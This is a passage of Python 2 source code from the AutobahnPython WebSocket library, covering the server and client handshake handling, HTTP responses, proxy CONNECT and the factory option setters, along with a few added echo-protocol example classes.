log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
## cancel any opening HS timer if present
##
if self.openHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("openHandshakeTimeoutCall.cancel")
self.openHandshakeTimeoutCall.cancel()
self.openHandshakeTimeoutCall = None
## init state
##
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During opening handshake the client request was invalid, we send a HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
"""
Send HTML page HTTP response.
"""
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendRedirect(self, url):
"""
Send HTTP Redirect (303) response.
"""
response = "HTTP/1.1 %d\x0d\x0a" % HTTP_STATUS_CODE_SEE_OTHER[0]
#if self.factory.server is not None and self.factory.server != "":
# response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Location: %s\x0d\x0a" % url.encode("utf-8")
response += "\x0d\x0a"
self.sendData(response)
def sendServerStatus(self, redirectUrl = None, redirectAfter = 0):
"""
      Used to send out server status/version upon receiving an HTTP/GET without
      upgrade to WebSocket header (and option webStatus is True).
"""
if redirectUrl:
redirect = """<meta http-equiv="refresh" content="%d;URL='%s'">""" % (redirectAfter, redirectUrl)
else:
redirect = ""
html = """
<!DOCTYPE html>
<html>
<head>
%s
<style>
body {
color: #fff;
background-color: #027eae;
font-family: "Segoe UI", "Lucida Grande", "Helvetica Neue", Helvetica, Arial, sans-serif;
font-size: 16px;
}
a, a:visited, a:hover {
color: #fff;
}
</style>
</head>
<body>
<h1>AutobahnPython %s</h1>
<p>
         I am not a Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws/python">my homepage</a>.
</p>
</body>
</html>
""" % (redirect, __version__)
self.sendHtml(html)
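

## Illustrative sketch (not part of the library): a minimal server protocol that
## only accepts the 'echo' subprotocol and echoes every message back. The class
## name and the 'echo' subprotocol are assumptions for this example; onMessage()
## is the data callback assumed to be defined on WebSocketProtocol earlier in this
## module, and ConnectionRequest is assumed to expose the 'protocols' list passed
## to its constructor in processHandshake() above. HttpException usage follows the
## onConnect() docstring above.
class _ExampleEchoServerProtocol(WebSocketServerProtocol):
   def onConnect(self, connectionRequest):
      ## accept only clients offering the 'echo' subprotocol
      if "echo" in connectionRequest.protocols:
         return "echo"
      raise HttpException(HTTP_STATUS_CODE_BAD_REQUEST[0], "only the 'echo' subprotocol is served here")
   def onMessage(self, payload, binary):
      ## echo the message back, preserving its text/binary type
      self.sendMessage(payload, binary)
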
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self, url = None, protocols = [], server = "AutobahnPython/%s" % __version__, headers = {}, externalPort = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket server factory.
      Note that you MUST provide a URL either here or using
:meth:`autobahn.websocket.WebSocketServerFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
      :param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnPython/x.x.x").
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server, headers, externalPort)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
def setSessionParameters(self, url = None, protocols = [], server = None, headers = {}, externalPort = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param externalPort: Optionally, the external visible port this server will be reachable under (i.e. when running behind a L2/L3 forwarding device).
:type externalPort: int
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
self.headers = headers
self.externalPort = externalPort if externalPort is not None else self.port
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSocket protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
      :param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
      :type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
      :param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if versions is not None:
for v in versions:
if v not in WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS:
raise Exception("invalid WebSocket protocol version %s (allowed values: %s)" % (v, str(WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS)))
if v == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if set(versions) != set(self.versions):
self.versions = versions
if webStatus is not None and webStatus != self.webStatus:
self.webStatus = webStatus
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if requireMaskedClientFrames is not None and requireMaskedClientFrames != self.requireMaskedClientFrames:
self.requireMaskedClientFrames = requireMaskedClientFrames
if maskServerFrames is not None and maskServerFrames != self.maskServerFrames:
self.maskServerFrames = maskServerFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def getConnectionCount(self):
"""
Get number of currently connected clients.
:returns: int -- Number of currently connected clients.
"""
return self.countConnections
def startFactory(self):
"""
Called by Twisted before starting to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
def stopFactory(self):
"""
Called by Twisted before stopping to listen on port for incoming connections.
Default implementation does nothing. Override in derived class when appropriate.
"""
pass
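

## Illustrative sketch (not part of the library): build a server factory for the
## example echo protocol above and start listening with the Twisted reactor. The
## function name, URL, port and option values are assumptions for this example;
## for a 'wss:' URL, reactor.listenSSL() with a TLS context would be needed instead.
def _exampleRunEchoServer():
   from twisted.internet import reactor
   factory = WebSocketServerFactory("ws://localhost:9000", protocols = ["echo"])
   factory.protocol = _ExampleEchoServerProtocol
   ## tighten a couple of protocol options for all connections of this factory
   factory.setProtocolOptions(openHandshakeTimeout = 10, maxMessagePayloadSize = 4 * 1024 * 1024)
   reactor.listenTCP(factory.port, factory)
   reactor.run()
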
class WebSocketClientProtocol(WebSocketProtocol):
"""
Client protocol for WebSocket.
"""
def onConnect(self, connectionResponse):
"""
Callback fired directly after WebSocket opening handshake when new WebSocket server
connection was established.
:param connectionResponse: WebSocket connection response information.
:type connectionResponse: instance of :class:`autobahn.websocket.ConnectionResponse`
"""
pass
def connectionMade(self):
"""
Called by Twisted when new TCP connection to server was established. Default
implementation will start the initial WebSocket opening handshake (or proxy connect).
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = False
WebSocketProtocol.connectionMade(self)
if self.debug:
log.msg("connection to %s established" % self.peerstr)
if not self.isServer and self.factory.proxy is not None:
## start by doing a HTTP/CONNECT for explicit proxies
self.startProxyConnect()
else:
## immediately start with the WebSocket opening handshake
self.startHandshake()
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection to server was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
if self.debug:
log.msg("connection to %s lost" % self.peerstr)
def startProxyConnect(self):
"""
Connect to explicit proxy.
"""
## construct proxy connect HTTP request
##
request = "CONNECT %s:%d HTTP/1.1\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "\x0d\x0a"
if self.debug:
log.msg(request)
self.sendData(request)
def processProxyConnect(self):
"""
Process HTTP/CONNECT response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % http_response_data)
## extract HTTP status line and headers
##
(http_status_line, http_headers, http_headers_cnt) = parseHttpHeader(http_response_data)
## validate proxy connect response
##
if self.debug:
log.msg("received HTTP status line for proxy connect request : %s" % str(http_status_line))
log.msg("received HTTP headers for proxy connect request : %s" % str(http_headers))
## Response Line
##
sl = http_status_line.split()
if len(sl) < 2:
return self.failProxyConnect("Bad HTTP response status line '%s'" % http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failProxyConnect("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failProxyConnect("Bad HTTP status code ('%s')" % sl[1].strip())
if not (status_code >= 200 and status_code < 300):
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failProxyConnect("HTTP proxy connect failed (%d%s)" % (status_code, reason))
## Ok, got complete response for HTTP/CONNECT, remember rest (if any)
##
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_CONNECTING
## process rest of buffered data, if any
##
if len(self.data) > 0:
self.consumeData()
## now start WebSocket opening handshake
##
self.startHandshake()
def failProxyConnect(self, reason):
"""
During initial explicit proxy connect, the server response indicates some failure and we drop the
connection.
"""
if self.debug:
log.msg("failing proxy connect ('%s')" % reason)
self.dropConnection(abort = True)
def createHixieKey(self):
"""
Supposed to implement the crack smoker algorithm below. Well, crack
probably wasn't the stuff they smoked - dog poo?
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76#page-21
Items 16 - 22
"""
spaces1 = random.randint(1, 12)
max1 = int(4294967295L / spaces1)
number1 = random.randint(0, max1)
product1 = number1 * spaces1
key1 = str(product1)
rchars = filter(lambda x: (x >= 0x21 and x <= 0x2f) or (x >= 0x3a and x <= 0x7e), range(0,127))
for i in xrange(random.randint(1, 12)):
p = random.randint(0, len(key1) - 1)
key1 = key1[:p] + chr(random.choice(rchars)) + key1[p:]
for i in xrange(spaces1):
p = random.randint(1, len(key1) - 2)
key1 = key1[:p] + ' ' + key1[p:]
return (key1, number1)
def startHandshake(self):
"""
Start WebSocket opening handshake.
"""
## construct WS opening handshake HTTP header
##
request = "GET %s HTTP/1.1\x0d\x0a" % self.factory.resource.encode("utf-8")
if self.factory.useragent is not None and self.factory.useragent != "":
request += "User-Agent: %s\x0d\x0a" % self.factory.useragent.encode("utf-8")
request += "Host: %s:%d\x0d\x0a" % (self.factory.host.encode("utf-8"), self.factory.port)
request += "Upgrade: WebSocket\x0d\x0a"
request += "Connection: Upgrade\x0d\x0a"
## this seems to prohibit some non-compliant proxies from removing the
## connection "Upgrade" header
## See also:
## http://www.ietf.org/mail-archive/web/hybi/current/msg09841.html
## http://code.google.com/p/chromium/issues/detail?id=148908
##
request += "Pragma: no-cache\x0d\x0a"
request += "Cache-Control: no-cache\x0d\x0a"
## optional, user supplied additional HTTP headers
##
for uh in self.factory.headers.items():
request += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## handshake random key
##
if self.version == 0:
(self.websocket_key1, number1) = self.createHixieKey()
(self.websocket_key2, number2) = self.createHixieKey()
self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
## Safari does NOT set Content-Length, even though the body is
## non-empty, and the request unchunked. We do it.
## See also: http://www.ietf.org/mail-archive/web/hybi/current/msg02149.html
request += "Content-Length: %s\x0d\x0a" % len(self.websocket_key3)
## First two keys.
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
## Write HTTP request body for Hixie-76
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
def processHandshake(self):
"""
Process WebSocket opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failHandshake("WebSocket connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
               ## we don't support any extension, but if we did, we would need
               ## to set self.websocket_extensions_in_use here, and not fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
         ## we handle this symmetrically to the server side .. that is, give the
## client a chance to bail out .. i.e. on no subprotocol selected
## by server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During opening handshake the server response is invalid and we drop the
connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
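

## Illustrative sketch (not part of the library): a minimal client protocol that
## sends a single text message once the opening handshake has completed and logs
## any text reply. The class name and message are assumptions for this example;
## onMessage() is the data callback assumed to be defined on WebSocketProtocol
## earlier in this module.
class _ExampleEchoClientProtocol(WebSocketClientProtocol):
   def onOpen(self):
      self.sendMessage("Hello from the example client!")
   def onMessage(self, payload, binary):
      if not binary:
         log.msg("example client received: %s" % payload)
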
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket client protocols.
"""
protocol = WebSocketClientProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self, url = None, origin = None, protocols = [], useragent = "AutobahnPython/%s" % __version__, headers = {}, proxy = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket client factory.
      Note that you MUST provide a URL either here or set it via
:meth:`autobahn.websocket.WebSocketClientFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSocket opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSocket opening handshake (default: []).
:type protocols: list of strings
      :param useragent: User agent as announced in HTTP request header or None (default: "AutobahnPython/x.x.x").
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param proxy: Explicit proxy server to use (hostname:port or IP:port), e.g. "192.168.1.100:8080".
:type proxy: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent, headers, proxy)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None, headers = {}, proxy = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
self.headers = headers
self.proxy = proxy
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSocket protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when mask it present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
      :type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
      :param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5, matching resetProtocolOptions).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSocket draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
